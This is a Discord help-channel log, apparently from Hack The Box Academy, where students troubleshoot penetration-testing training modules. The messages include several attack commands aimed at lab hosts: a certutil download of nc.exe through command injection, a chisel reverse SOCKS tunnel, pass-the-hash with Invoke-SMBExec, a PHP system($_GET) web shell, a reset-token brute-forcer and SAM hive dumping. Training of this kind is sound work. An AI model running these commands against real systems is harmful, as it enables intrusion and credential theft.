#modules

Latency on loading the machine resource perhaps, resulting in a delay in updating the UI?

Interesting case indeed. I wonder if it's replicable on all vpns

"You need to wait 2 minutes before spawning another machine"

I've been denied

Humbling

Ok yeah I see it, will raise with the team

Could perhaps just be lag in the UI loading, the data coming back from the server is fine 😦

If you are willing to reproduce in a recording or something @mint trout (either video recording or network logs, but I'd prefer not network logs.. as they are pretty... verbose..) I'd be curious to see the behaviour

Anyway, attempt to sleep #3, hit me up in DM if you're willing 🙂

The fact that the machine data is received, and then the UI is rendered based upon the data, a bit weird that it wouldn't show that right state

Scratch that 😅 It'll be due to latency which would cause a delay in a UI update, with the root cause being the inital state data not accurately reflecting the machine state.

Have reported to the team @mint trout - thanks

sweet a new module just dropped 😄

❤️ academy

Hi

Hi 🙂

How you doing

good 😄

Are you good with hack the box

U there?

im here 🙂 I can try and help but there are many people more knowledgable than me

Its ok if you’re a kind teacher

🙂

@tiny brook I don't accept random friend requests

I’m not random

I need some help trying to learn how HTB works

Idk you, so yes it's random

And you can google "intro to hack the box" and there's a help forum on how to get started

Not funny

I can't connect to the VPN, tried US 2 and 3. I'm guessing this is on my end? Not seeing anyone else talking about stuff being down.

getting connection refused errors

working now, had to switch to us3 with udp

Not trying to be funny

Stuck on BROKEN AUTHENTICATION: Predictable Reset Token
Question:
Create a token on the web application exposed at subdirectory /question1/ using the *Create a reset token for htbuser* button. Within an interval of +-1 second a token for the htbadmin user will also be created. The algorithm used to generate both tokens is the same as the one shown when talking about the Apache OpenMeeting bug. Forge a valid token for htbadmin and login by pressing the "Check" button. What is the flag?

I have the script ready for token generation and testing.
What I am no getting is this UTC time conversion. The time which is displayed in the webpage is already in UTC, but with this time right tokens are not generated. (I know [timestamp in milliseconds-1000] and [timestamp in milliseconds+1000] range thing)

Can anyone show to the correct way to do it? In which time should I convert it..!!!

And even converting to local remain same..!!
I am not getting it's logic

Not funny again

+/- 1 second for the proper token

https://tenor.com/view/betty-white-math-calculating-confused-golden-girls-gif-27641696

change the script to +/-1
it resulted to generate only 2 tokens which are incorrect

I followed forums and others over here, everyone is taking about 1000 thing but now it's not working..!!
I am really not getting it

1 second is 1000 milliseconds

I am using this to create the token md5_token = md5(str(x).encode()).hexdigest()
where x is the epoch time in milliseconds
do i need to modify something over here?

||from hashlib import md5

print ("Enter the time in milisec:\n")
time = int(input())

starttime = time-1000
endtime = time+1001

# loop from start_time to now. + 1 is needed because of how range() works
with open('tokens.txt', 'wt') as t:
    for x in range(starttime, endtime):
        md5_token = md5(str(x).encode()).hexdigest()
        print(md5_token,file=t)||

Here is the python code i am using. it generates a tokens.txt
This tokens.txt i just with wfuzz to check to correct token

Any corrections/suggestions will be helpful

I have tried everything that I can think of for the answer to question 2 on the "Attacking web applications with ffuf". I've found 2 extensions and no combination of what I enter is correct. I've verified with external sources that I've got the correct information. What do?

alternatively, does Hack the Box have a forum where I can ask questions?

What section of that module?

It's the skills assessment section

you can DM me your answer and i can double check

ohhh i see

Hello everyone! Is there someone who finished ADCS attack module?

I need help badly to skill assessment
I followed ESC8 and ESC11 attack scenario I got stuck with coercer and PetitPotem
I am getting "The specified named pipe is in the disconnected state" error

I tried to target 2 IP I got stuck. It's been 10 hour. I appreciate anyone for help

If PetitPotem didn't work for you, you'll need to find another way.

Powerhsell newbie. After importing PowerView.ps1, I try to run Get-NetUser -TrustedToAuth.
But I just get an error that a 'parameter cannot be found that matches' . If I run Get-NetUser without the parameter I don't get an error. What could I be doing wrong?

They are working but giving me error + courcer as well

So then it is not working.

You need to find another way

I'm at your EDIT1 stage of this. I've done a lot of exploration but I might need to talk it through. Would you mind if I flicked you a DM about it?

Edit: never mind, I've just solved it. What a great puzzle. Yes, step back and strategise once all the bits are on the garage floor. Look at what each endpoint actually does.

Yeah np, DM me

nmap is not working, can anyone help?

it is super slow

i connected with the ovpn file in one terminal, and opened another terminal to do nmap scans

This is the only place where I have permission to message, so sorry if I am on the wrong place

Are you using -T 0 -sU

no

I think the problem is with connecting to the ovpn file

in all videos that i have watched, after connecting to the vpn, the end line in the terminal is Initialization Sequence Completed

and then there is "tun 0" written somewhere

in my case, there are multiple lines after connecting to ovpn

and it is "tun 1" instead

sudo killall openvpn then connect again, if you can ping the target ip, you're connected

pinging to the ip is a success

but scanning using nmap is becoming very frustrating

even a simple nmap scan is taking more than a minute

then it's not a vpn issue

depending on how you're scanning it can take a minute to hours

Are you using your own virtual machine, or are you using the pwnbox?

my own

i tried doing some of the machines that I tried using the pwnbox

and it worked

i can only conclude that nmap is really slow in my device for some reason

like what would take 1/2 second in the pwnbox might take around 10 in mine

anyone has any solution to this? or am I to be bound by this slow-ness of nmap?

Make sure to choose either pwnbox or your VM. Using both will interfere with the VPN connection / drop your connection.

I've spent a lot of time in "Exploiting internal Web Applications II" trying to find the flag but it's annoying working with the exfil server. Are we able to create a web shell? Seeing as it's a public IP I figured we're not allowed to create web shells on these

yes i used pwnbox like a week ago

today i tried connecting using ovpn

will try again tomorrow

Thanks for all those who helped

I doubt it would work. Once you have the right payload it won't take too long doing it manually.

Hi in the password attack Module for CPTS.

For attacking SAM and attacking LSASS. When i try to transfer the dumpfile from the rdp session to the attack box. It always fails when i use the move command. Itgives me An unexpected network error occurred. I already set up the smb server with smb2 support and it still always fails for transferibnvtbe fail. I tried other means of transferring file but it still does not work

I clicked the Hint button and it told me where the flag was

There are multiple ways to transfer files. If you're using RDP a real simple way is using Remmina and just adding a share folder, or adding a share folder to the xfreerdp cli.

How did you manage to solve the problem? You use humangod’s methodology?

Thanks for the help. But Yea i did that and it still didn’t work. Its keep disconnecting the rdpsession stating theres and error

Attacking Tomcat CGI

I am trying to get shell using the commands below, download was successful (200) when i checked my http server but when I dir, it wasn’t saved. Anyone know possibly why?
<victim IP>:8080/cgi/welcome.bat?&&C%3a%5cWindows%5cSystem32%5ccertutil+-urlcache+-split+-f+http%3A%2F%2F<IP>:8000%2Fnc%2Eexe+nc.exe

you can try a http server, or an ftp server

You're trying to save to windows\system32, and the tomcat server likely doesn't have permissions to save a file there. that would be my guess.

is there a way to reset module progress?

If you have completed a module, this button is available. I don't know if it resets the module

I dont think we normal users have that? Or maybe im blind

I'm just as normal as you are, I think 😉
Go to the module on the last page and then click on the Finish button. You will then be taken to a page where you can rate the module, where you will be offered further content and where this button is available

you are right

Hey everyone, I would like to ask for some tips regarding the last task in the "pass the hash" section of the "password attacks" module.
I'm trying to create a reverse shell to the target, using the Invoke-TheHash tool, but even tho the command says that it was executed, I don't get a connection in my ns.

I have tried changing the payloads, playing with different domain names, port numbers and I have also tried running these commands from other users using mimikatz, but to no avail. Can anyone push me in a right direction? I'm not sure what else I can do

In Password Attacks Network Services, Why errors?

did you generated your own powershell payload with tun0 ip address ? or just used that one from module

Pretty sure thats not the.correct password/username

why?

I created my own one with the tun0

User john is presented on this machine but with a different password, in my case I've found user c*** to log in to RDP

dm

Yes, set timeout higher or use hashdump, we got administrator rights

Why can't I crack it?

I'm doing the Documentation & Reporting Practice Lab but it's painfully slow and keeps closing the connection. Is it just me or you guys also experienced this? I'm gonna take the exam in a couple of weeks, but if it's the same in the exam env then I will go crazy

Which user and password list did you use?

resource

Uh, I found that I could crack it out by using hydra instead of xhydra

hello team is someone can help with serverside module and nginx reverse proxy section

woot!

nice

Thank you! took me forever, but it is done. I have about a month before I take the test.

Is there a correct account number in here? Why can't I try everything?
这里有正确的帐号吗？为什么我不能尝试一切？

yeap thanks bro

can someone help me solve PDFy challenge?

you posted the same question in #challenges 10 minutes ago

someone told me i should ask here

PDFy is a challenge, this channel is for academy modules

Attacking Common Services, Medium
can someone tell me how many TCP ports i should see? found a post, they have another open port, ive restarted my box several times, scanned all tcp ports, but still dont find the "missing" service

6

ok ima restart box toll it works xd

I know sound silly but use the -p-

yea i do

those boxes are bugging quite often imo

who can help me

Hey guys. Can you help me locate the area where you can see the Academy modules and it shows you where retired labs tie back to it if you need extra practice? I glanced at it a while ago, but I wanted some extra practice and I don’t know where to go for it.

Academy x HTB Labs

Thats it, thanks buddy

I sent you a DM actually

finnaly this damn port is shown to me

How do you guys study for cpts. Do you do labs from retired machines or do you do it after you finish the academy

i think the most common way to prep is to do the Attacking Enterprise Networks module blind

people have also done the Dante and Zephyr pro labs

I’ve been doing nothing but Academy stuff but I feel like I’m not tying it together well so I just paid for VIP plus so I can complement my studying

i've heard people say that doing the boxes doesn't help too much as much of what you see is out of scope on the exam

Hmm

Well I’d think it would get your mind right

Oh well

i definitely think it helps with understanding the process

and for that reason i think if you want extra practice, you should try doing a pro lab

Am I thinkibg myself or exercise related with window rdp is hard

one reason I sure is my own internet connection

So much to do so little time

also the gui is like prank on me or something

Hi
What would happen to my weekly streaks if I run out of boxes and modules I can purchase?
I'm currently at 21 weeks (kept my streak from the week weekly streaks were announced) and have purchased every tier 0 and one mini module from tier I, all and all with only 70 cubes. I have not finished all the modules I have purchased tho and 6 modules are remaining to be done but I'm curious is there any mechanic to preserve my streak if I'm not able to purchase more modules?

From my experience,there is not.
Btw streak can be done by doing exercises or complete a section 3 times

In intro to networking > VPN -> ??

I am having trouble with the Windows File Uploads section of File Transfers module. Specifically with using the WebDav for SMB file uploads. I have gotten all the other methods for file downloads and uploads to work, and this is the only one I am having trouble with.

bruh i cant chisel on htb pivoting ubuntu@WEB01:~$ ./chisel client -v 10.10.14.171:1234 R:socks
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.34' not found (required by ./chisel) ./chisel: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.32' not found (required by ./chisel)

the target device isnt updated

you can compile with no CGO and it will work

whats cgo

Whoops. didn't mean to post that yet.
Anyway, SMB file uploads with WebDav :
I have started the WebDav server on my attack machine - I am using my own machine with a VPN, because if I used the PwnBox, it kept saying that port 80 was already in use.
Here is the command I used:

wsgidav --host=0.0.0.0 --port=80 --root=~/sharefolder --auth=anonymous

It appears to be running just fine. I placed a file in the designated root directory just so I could make sure I could see the file when connecting from the target windows machine.

I made sure I could ping my attack machine from the target machine, and that works fine.

I then enter this command from the PowerShell terminal on the target windows machine:

dir \10.10.15.197\DavWWWRoot

All I get is the following error:

"dir Cannot find path '\10.10.15.197\DavWWWRoot' because it does not exit"

Download the chisel source and golang. run it like so
CGO_ENABLED=0 go build main.go

ok damle

you can also try some earlier versions of the chisel program and see which versions of GLIBC are linked to it and try to find the right one. But I think compiling a new one will be easier

I am having trouble with the Windows File Uploads section of File Transfers module. Specifically with using the WebDav for SMB file uploads. I have gotten all the other methods for file downloads and uploads to work, and this is the only one I am having trouble with.
Whoops. didn't mean to post that yet.
Anyway, SMB file uploads with WebDav :
I have started the WebDav server on my attack machine - I am using my own machine with a VPN, because if I used the PwnBox, it kept saying that port 80 was already in use.
Here is the command I used:

wsgidav --host=0.0.0.0 --port=80 --root=~/sharefolder --auth=anonymous

It appears to be running just fine. I placed a file in the designated root directory just so I could make sure I could see the file when connecting from the target windows machine.

I made sure I could ping my attack machine from the target machine, and that works fine.

I then enter this command from the PowerShell terminal on the target windows machine:

dir \10.10.15.197\DavWWWRoot

All I get is the following error:

"dir Cannot find path '\10.10.15.197\DavWWWRoot' because it does not exist"

Any help would be appreciated

sorry, i went to sleep and didnt see this. that's the issue -- when it's working as intended on a refresh it shows still spawning however when I'm just sat here like a twat for 5-10 minutes and it still says Spawning, on a refresh I get the button to spawn the machine. It's so intermittent but when it happens again I will save the clip 👍

I started the macos fundamentals module and i'm wondering if there is a macos vm or i need to have a mac ?

It's stated on the module overview (before purchase) that a Mac system would be required

Or a ton of googling

ah shit, ok thanks, didn't see that part

Hey. I am trying to get through Password Attacks PTH:

Invoke-SMBExec -Target \\172.16.1.5\\DC01\c -Domain inlanefreight.htb -Username david -Hash c39f2beb3d2ec06a62cb887fb391dee0 -Command "type david.txt" -Verbosec

But the commands outputs \172.16.1.5\DC01\david.txt did not respon
i tried many ips but nothing...

• make clean
  CDPATH="${ZSH_VERSION+.}:" && cd . && /bin/bash '/home/ubuntu/ptunnel-ng/missing' aclocal-1.16
  /home/ubuntu/ptunnel-ng/missing: line 81: aclocal-1.16: command not found
  WARNING: 'aclocal-1.16' is missing on your system.
  You should only need it if you modified 'acinclude.m4' or
  'configure.ac' or m4 files included by 'configure.ac'.
  The 'aclocal' program is part of the GNU Automake package:
  https://www.gnu.org/software/automake
  It also requires GNU Autoconf, GNU m4 and Perl in order to run:
  https://www.gnu.org/software/autoconf
  https://www.gnu.org/software/m4/
  https://www.perl.org/
  make: *** [Makefile:335: aclocal.m4] Error 127
  ubuntu@WEB01:~/ptunnel-ng$ ls
  aclocal.m4 config.guess contrib install-sh NEWS src
  AUTHORS config.log COPYING Makefile PKGBUILD test
  autogen.sh config.status debian Makefile.am PKGBUILD.dev web
  autom4te.cache config.sub depcomp Makefile.in README
  ChangeLog configure Dockerfile missing README.md
  compile configure.ac INSTALL model_file.c selinux
  ubuntu@WEB01:~/ptunnel-ng$ putnnel

Command 'putnnel' not found, did you mean:

command 'ptunnel' from deb ptunnel (0.72-3)

Try: sudo apt install <deb name>

ubuntu@WEB01:~/ptunnel-ng$ sudo ./ptunnel-ng -r10.129.153.190 -R22
sudo: ./ptunnel-ng: command not found
bruh why this not work

i tranffered ptunnel repo to target and then tried to make it but it ownt work

try chmod +x to make it executable

i think hes talking about a git repo, and make isnt working

did you follow these instructions?

@mint trout maybe you know how to pass the hash correctly?

That

yes i did

//172.16.1.5\DC01\david.txt did not respond

smbexec gets you a shell, it doesn't open a file

Okay then, but where is the output?

VERBOSE: Service GRXCSMRWOYFADTUQLFJK deleted on 172.16.1.5

I tried type david.txt but nothing outputty shows up

wdym where is the output

what do you see?

https://pastebin.com/ejy41d0x

Try without passing a command to it

Invoke-SMBExec -Target 172.16.1.5 -Domain inlanefreight.htb -Username david -Hash & -Verbose
VERBOSE: [+] inlanefreight.htb\david successfully authenticated on 172.16.1.5
[+] inlanefreight.htb\david has Service Control Manager write privilege on 172.16.1.5

Also redact the hash as it's spoiler

Redacted. Any hints?

I dont recall having too many issues with it tbh

config.status: executing depfiles commands
+ make clean
CDPATH="${ZSH_VERSION+.}:" && cd . && /bin/bash '/home/ubuntu/ptunnel-ng/missing' aclocal-1.16 
/home/ubuntu/ptunnel-ng/missing: line 81: aclocal-1.16: command not found
WARNING: 'aclocal-1.16' is missing on your system.
         You should only need it if you modified 'acinclude.m4' or
         'configure.ac' or m4 files included by 'configure.ac'.
         The 'aclocal' program is part of the GNU Automake package:
         <https://www.gnu.org/software/automake>
         It also requires GNU Autoconf, GNU m4 and Perl in order to run:
         <https://www.gnu.org/software/autoconf>
         <https://www.gnu.org/software/m4/>
         <https://www.perl.org/>
make: *** [Makefile:335: aclocal.m4] Error 127'```
i cant make ptunnel on the target device

Please wrap your message in triple backticks ``` before and after

ok sorry but this module cant be ebaten

I honestly skipped trying to make the ptunnel-ng

I just used a different method

do u have module flag then i can take

Just use a different pivoting/tunneling method

¯_(ツ)_/¯

 Invoke-SMBExec -Target 172.16.1.5 -Domain inlanefreight.htb -Username david -Hash & -Command "type D:\DC01\david\david.txt" -Verbose

What is wrong with it? I am struggling to do it 2 hours already

ok

Aren't you meant to just view the \\dc01\david share?

I am

That doesn't necessarily mean the file is on D:\

But nothing works at all

i tried dir, tried type

Try methods shown in the section

i tried mimikatz

Mimikatz will extract hashes

there is two methods of doing this. shell and right away command

for shell there is no permission

command shows no output

What section exactly?

Password Attacks Pass The Hash

Try using mimikatz or rubeus to pth and create a new cmd and try accessing the share that way

ERROR kuhl_m_sekurlsa_pth ; CreateProcessWithLogonW (0x00000002)

I'm working on Password Attacks - Attacking SAM - Second Question:

When I go to copy the files from the Windows machine to my attack box via smbserver.py, the script works on my attacker box, but when I go to the Windows box and try to send the file, this is what I'm getting:

C:\move sam.save \10.10.15.3\CompData
The network path was not found.

Did you run as admin?

Is that what you named your share?

Yes.

Yep

I followed the guide exactly.

I also tried pinging the attack box from the remote machine, no response.

Somehow I have 2 VPN connections...what the hell 😐

Okay, I can ping the other VPN connection from the Windows machine, so they are connected.

wdym 2 vpn connextions

tun0 and tun1

Now it's saying:

Access is denied.
0 file(s) moved.

\IP

\\Ip\Compdata

I guess you used 2x\ but discord funny

Yes.

Well i did that section today and had no problem moving, it, run as admin thats it

If you have 2 vpns something funny. Restart both vpn connection and the box

Let me try rebooting.

Yeah you're right about that.

Okay, got them.

Okay, now when running:

sudo python3 /usr/share/responder/tools/MultiRelay/impacket-dev/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

I'm not getting any output 😐

Does same happens if you dont run sudo?

Same result.

Check if any of those 3 files are empty

I found another copy of the script...

That was the problem.

Wait thats not the correvt path to secretsdump.py

Yea lol

I'm on my own machine.

But yeah I didn't check the script :/

Yea but there shiuld ne another script

There's a few.

A lot

Is the hash before or after the colon?

It's before right?

Its the last one

Like
Username:gdiwjOjsheoa;thiscorrecthash::::

So it's after the colon, I see. Thank you for your help 🙂

For some reason this module is kind of a pain.

I enjoyed it

Interesting.

But if something goes wrong it can be pain

I totally see the necessity though.

Especially if you're pentesting infrastructure. It's impossible not to need this.

Ture. Well newer windows hash it differently but we still can crack them so if the passwords are crackable its needed

Ofc if we can dump it

I created a team but how do I invite my friend to my team???

Either I'm blind or dumbasf but I cannot for the life of me find out how

in this section (https://academy.hackthebox.com/module/77/section/859), the main website isn't styled, despite themes existing in /theme
is this an error?

I am at the same state as you were when you posted Though, I never got an other ticket other than server01.inlanefreight.local. I have been running rubeus monitoring for more than 30 minutes. Did you solve the problem with rubeus or did you follow the linux path? Thanks

Not an error

Ok thanks. I also can't find the admin password. Can someone point me in the right direction?

Just look around also some guessing can work too

what does this mean? dcfdd5e021a869fcc6dfaef8bf31377e from system($_GET['dcfdd5e021a869fcc6dfaef8bf31377e']); in the module https://academy.hackthebox.com/module/113/section/1210 i tried decoding it and it didn't work

Looks like hex maybe

Could be a session cookie

Or something

that's the GET parameter for the page

it's demonstrating that in a pentesting engagement, you ought not to use easily guessable parameters (e.g., cmd)

in this case, they used an MD5 hash as the parameter which is not easily guessable

wju

bruh i RDP and SOCKS Tunneling with SocksOverRDP transferred over the socksoverdp but the freaking thing thing on target device wont load the dll even tho thats what the module says cause it says there a virus

regsvr32.exe SocksOverRDP-Plugin.dll
operation did not complete succesfully because the file contains a virus

disable av/real time protection

it i

how's it saying there's a virus if it's disabled?

if it's disabled it wouldn't be able to do that

idk

you can DM me and I can help if you want

nvm i found it thank u u uwere right but wtf proxifier costs moeny??? awhy it ll us to use

haha. free trial though

Enterprise licensing goes brrr

Hello guys does anyone here know anything about cyber security?

no, that's why we're here, to learn

Someone threatened to swat me so my question is is it possible for someone to find my address from my tictoc acc?

no

Nope, we dumb

i configured proxifier for 127.0.01 1080 then i go to rdp and it doesnt rdp into the private network why?

<@&861185840277487616>

yes they can and now i will find ur ip from dis cord >:)

Any answers ?

Why you pinged for this?

Take it to the authorities, this isn't the place

Depends

Was it wrong? The guy is asking for help doxxing people.

He's saying someone is threatening to swat him

No I’m asking for help to not get doxxed myself

Reread the question.

alright sorry

My tictoc is completley anonymous no information can be found on it

If you have multiple accounts under the same username it gets easier to narrow down who you are

Is it still possible to find my address or no?

I don’t have any other accounts

Not directly from tiktok

But I'm referring to other social media accounts

Yh ik

what module is this a part of?

That’s the only account with a name like that, my other accounts on other media aren’t even remotely similar

Anyway. Getting off topic

i configured proxifier for 127.0.01 1080 then i go to rdp and it doesnt rdp into the private network why?
how can i get proxifier to work

Read #rules and #welcome

The steps in the module worked for me

theres no network traffic for proxifier

I should be good then, thanks a lot 🙏

You can still DM me if you want help but I'm about to leave

i c ok danke

anyone working on AD Skills Assessment Part II? My connection keeps getting closed after 15-20 seconds, totally unenjoyable and frustrating

Try a different vpn region and tcp?

I'm trying from the pwnbox but it's the same there

Message support, it's weekend so you may not get a reply

yea I already did but I really hope it's not going to be the same during the exam because it's impossible to do anything like this

the exam environment is more stable than the module environments

good to know 🙂

I'm doing end of module exercieses for the DNS enumeration section under Footprinting module

successfully managed to perform a zone transfer, but not seeing a txt record with a flag.... not sure if I misunderstood

Attacking Common Services, Hard

need a nudge

what ive done so far:
||got into SMB with Null Session, found some folders and interesting .txt files
brute forced RDP as user f.... and logged in via xfreerdp

from the outside i cant login mssql, and as user f.... i cant find anything that looks like a DB||

There's a subdomain you can transfer

sqlcmd

In command prompt

Or powershell

There's multiple questions

ahh nm then

One of them is the txt record

ah thx

ok thx

does that mean bad login/password combo or does it mean something else?

bc it talks about driver

the login failed, bad creds or the user doesn't have permission

hm im a bit lost, tried to impersonate the other two users with those creds lists from SMB by opening promt as a new user without success
also connecting to the DB as those user with the creds files no success. what am i missing?

RDP and SOCKS Tunneling with SocksOverRDP
i do all of it then when I connect to the 2nd pivot device it logs in then says network failed

how the frick can i make it work? it just fails network connection when i log in as jason

now i get it... so basically when the user sends a request for /dcfdd5e021a869fcc6dfaef8bf31377e it will run the system function that will give us shell access

http://page.htb/param?dcfdd5e021a869fcc6dfaef8bf31377e=id

if i can do a zone transfer from a nameserver. what is the point of running a bruteforce via a script like dnsenum?

am i right in thinking that a zone transfer will give me everything and thus a bruteforce for more information is not necessary- at least by querying the dns server

i can impersonate 2 users inside sqlcmd, but both dont have sysadmin privs

In the SQL Map HTTP Request section, why does
sqlmap 'http://<ip>/case3.php' --cookie='id=1' --dump --batch
not work, but
sqlmap 'http://<ip>/case3.php' --cookie='id=1*' --dump --batch

does work?

The way the module explained it, the * was only to specify one of multiple options

I'm getting an error
[16:52:20] [CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1'). You are advised to rerun with '--crawl=2'

This should work

Also, --dump is not covered until the next section.

I'm in

--dump isn't covered until the next section on database enumeration

Am I supposed to read ahead to the end of the module (all sections) before trying the questions for each section?

Also, question 4 doesn't have any JSON data. Do I just use the regular header?

Nevermind, guess not

Where is the JSON data then?!

Could som1one please help me with this question

Investigate all records for the domain "inlanefreight.com" with the help of dig or nslookup and submit the one unique record in double quotes as the answer.

working on https://academy.hackthebox.com/module/18/section/81

I ran the following, but nothing comes out in the terminal...

find / -type f -name *.conf -size +25k -size -28k -newermt 2020-03-03 -exec ls -a {} ; 2>/dev/null

am I doing something wrong?

i have the \ aft er the {} but it's not showing in my cpy/pste

Did you get this figured out?

there are forum posts on this that can help

you can use back ticks for code in discord
for example

find / -type f -name *.conf -size +25k -size -28k -newermt 2020-03-03 -exec ls -a {} \; 2>/dev/null 

No i put it down for now sense im really lost i feel like i executed most of the commands given to use

Follow the commands one at a time and verify as you move along.

like write down all the unique records possible ?

No, compare your output to what's in the lesson.

My fault. My outputs were the same i even tried digging deeper

finally made it to Attacking Common Applications, ima be dead T-T

Im doing AD enum & attacks, it gives incorrect creds when im trying to rdp from my windows but same creds are working when i rdp using my linux. Anyone knows what could be the reason?

the domain, xfreerdp automatically determine the domain I believe, for others you might have to specify manually domain\user

You need to set the source port for your own connection as 53

With netcat

Wait

Literally just be patient

It can take up to a minute

Nope

I'm telling you to be patient with nc

No

Part of the module told you that you may need to use netcat, as nmap may not grab everything

Then you're not gonna like password attacks

A lot of this field is patience

Just don't get hung up on it

The intended way is with nc

Maybe it's not a banner

It could be

You're gonna run into situations where one tool doesn't get the answers but another does

And like I said, it could be coded to not be a banner, and instead be on a polling timer to send it every N seconds

It's not though

Just forget about it and move on

You're gonna have to get over that then

Because nmap can and will miss things, which is the point

I am working on the module: Password Attack - Pass the Ticket (PtT) from Linux. I have issue with evil-winrm. I was successfully connect to dc01 with Julio ticket, but when I ram any command, I got an error and the the evil-winrm terminate. PLease advise. Thank you very much.

here is the error I got:
Evil-WinRM PS C:\Users\julio\Documents> whoami
[proxychains] Strict chain ... 127.0.0.1:1080 ... dc01:5985 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... dc01:5985 ... OK
inlanefreight\julio
malloc_consolidate(): unaligned fastbin chunk detected
zsh: IOT instruction proxychains evil-winrm -i dc01 -r inlanefreight.htb

your evil-winrm might be messed up, reinstall maybe

has anyone ran into this issue with bloodhound python ERROR: Could not find kerberos credential cache file

I figured it out, I had to edit the krb5.conf file (made it perms 777)

AD Skill assessment 1.
Question: Submit this user's cleartext password.

I tried mimikatz with logonp-- even with the FXXL option, and I still didn't get anything. Any ideas what I can do?
I can try secretsdump.exe but I seriously don't get what kind of prompt/perimeters I should give.

you can use secretsdump, dump the reg hives locally, transfer them out and use secretsdump.py on your one machine

Fair point.

Ima try that, ty.

Hi, I am doing Pass the Hash (PtH) section exercise. While I have managed to get the david.txt file for

Using David's hash, perform a Pass the Hash attack to connect to the shared folder \DC01\david and read the file david.txt.
what I don't understand is that the command prompt that I get after executing mimikatz command using david's hash, shows MS01\Administrator when executing whoami. Both the powershell access has the privilege of user MS01/Administrator , then why in one instance I can access DC01, while on other I cannot?

any hint for the list used for the kdbx archive on password labs - hard?

You're impersonating David still

Crack the password and use it on the machine, hint: ||it's for a password manager||

sure but the list used for its hash, having trouble with that

Password list, mutated password list, rockyou

used them

Generally try in that order

The password is in one of them

Anyone free to give me a hint as to why I can't crack the Administrator password for the "Password Attacks Lab - Hard" module? I've tried numerous time to brute force it with the mutated passlist and I get nothing.

Did you use the 2john for it?

But how?

Hashes are useful without needing to be cracked

How can I confirm that?

You can access his share

It's one of those things that don't show up because windows is dumb

Yes. I know this in this particular case. But when I have to do pentesting without the knowledge that his share exists in another server, how can I be sure?

Just the fact that I am using David's hash should confirm that I have his privileges?

you cant be sure of stuff unless u try it out

It would error out if it didn't work

Okay thanks!

marcie I need a tip

yup

I got SAM save, security save and system save, and I wanna transfer them.

Actually nvm

If you have an rdp session: xfreerdp has /drive: btw

I used a fair bit of pivoting for the first one, since you're only given a web foothold

rockyou is supposed to be 133mb right?

Rockyou is much larger, the gzip might be smaller though

the one in /opt/useful/seclists in the other modules is 133mb, used that before

#1231843662489456661 message

I think the seclists one is different

generally brute forcing passwords shouldnt take more than 5-10min on htb right?

The one I've used is default in my /usr/share/wordlists

you saved my life

This would be cracking, not bruteforcing

right yeah

AD skill assessment 1 is burning me, but I am almost done

2 is somewhat better as they give you a jump host to use instead of a shitty web launch poiny

And yes, the jump host they give has all the tools

thank god

so uh, I saw the drive option, I don't get what it does

does it create an active shared folder

yup, same number of lines as mine lol

between the attack host and the one I am connected to

Hello friends, can someone help me on suricata skill assessment?

Basically makes a network share

I have no idea what I am doing wrong ima open up some documentation

Ohh drive name, path

/drive:[name],[path]

Or path,name

Iirc it works either way

well xfreerdp loaded, let's see where I can find that

"This PC"

I don't think it worked

Sorry I meant "network"

Getting over a nasty headache

folder empty

shiiii, yeah ur good dw

\\tsclient\shareName

Will it work even if it doesn't show up?

You also shouldn't need quotes for the filepath

that's the prompt I gave

it should show up, you can try to access it in the command line ig

will try again with the quotes

That looks fine to me

AHHH THERE WE GO

Delete this

Looking hot

checking if its the right hash

check md5sum but not here

X_X

||:keepass2john Logins.kdbx | grep -o "$keepass$.*" > CrackThis.hash ||

this command right?

You don't need to grep

i was about to ask why did u grep

You can just redirect to a file

Another question, when I add en entry to registry for xfreerdp as reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f, I can no longer connect to the target using evil-winrm, it just shows TimeOut? Is it just me or anyone else is also facing the same problem?

restrictedadmin should only affect rdp

can i dm someone? feel like ive done all the necessary steps

Just an idea, when I did this module I did not check md5 of transferred file and .... There was an issue.

Hi everyone,
In the module 'System Information', after I connect using academy-regular.ovpn from my Vmware, I get this (screenshot) and it keeps saying permission denied. How do i make this work? I used the password as shown in the module but I keep getting this:

Work on the syntax

How do i do that? I'm a total newbie and would really appreciate your support.

Read the section of the module as it would hint you about the syntax of the SSH command if you are working on the Linux Fundamentals module

Thank you! I'l have a look at it now.

ssh user@ip

When I do that, I get 'Temporary fail in username.'
I am still trying to figure it out.

you'll need to use the right username

clever

MVP

I keep getting the same issue.
I typed the password correctly, I even copied and pasted it but the issue is still the same in my VMware

Wrong syntax on ssh connection.

What am I missing here? When I try to ssh htb-student (ip), it doesn't connect.
I don't know what to do

ssh htb-student@{ip}

Wow! I got in!
I will make sure to read the syntax clearly next time.
Thank you all so much for the support!

this or -l for username

guys my HTB academy of 8$ subscription renewed automatically and thats fine, but the problem is that my CC is empty even before the renewing day 😭

which was on 21th

hello guys, in the pivoting module, everytime I run dnscat2.ps1 on the windows host, Im able to execute one command from the server then it disconnects throwing an error

is it a bug in the ps1 module of dnscat ?

I had no issues completing that section as it was instructed

okay

null hashes for sam and system in the unlocked vhd, not a bug right?

password attack labs - hard

it would greatly help if you put the module and section, but i think i recall something like that and nothing was bugged

Ok, any tips going forward?

you can dm me your steps and i can look at it

how to access challenge channel

i think you have to set yourself up through the #welcome channel first and link your account

Anyone ran into this problem: ./chisel: error while loading shared libraries: libgo.so.42: cannot open shared object file: No such file or directory.
While doing the pivoting with chisel ?

yes, you need to downgrade and use an older version of chisel

okay thx mate

You can compule a static one with go

ive got problem loading the page opening the ip adress

by static u mean a binary that doesnt rely on shared libraries ?

hey?

@winged egret yes in go its fairly easy most of the time you get there with CGO_ENABLED=0

mmm ill keep that in mind thx

No one has any idea what you're talking about, we're not mind readers, you should include the module and section you're having trouble with

"NTLM RELAY ATTACKS", Skill Assessment: I am currently stuck on Question 2 and could use some nudge. I will share what I have tried so far.

try one of the relay esc

Thx for the prompt response! I have tried pretty much any esc technique. I can give more details in DM to avoid spoilers.

In Password Attack Password Reuse / Default Passwords, I logged into ssh as sam and then used mysql -u -p but I don't know what to do, can anyone give me some tips?

use the concept taught throughout the module

don't overcomplicate it

Hey all! Not sure what the issue is here. This is the Footprinting, SMB module

I made sure no trailing white spaces are there and also tried respawning the machine, but that unfortunately did not help

wrong flag

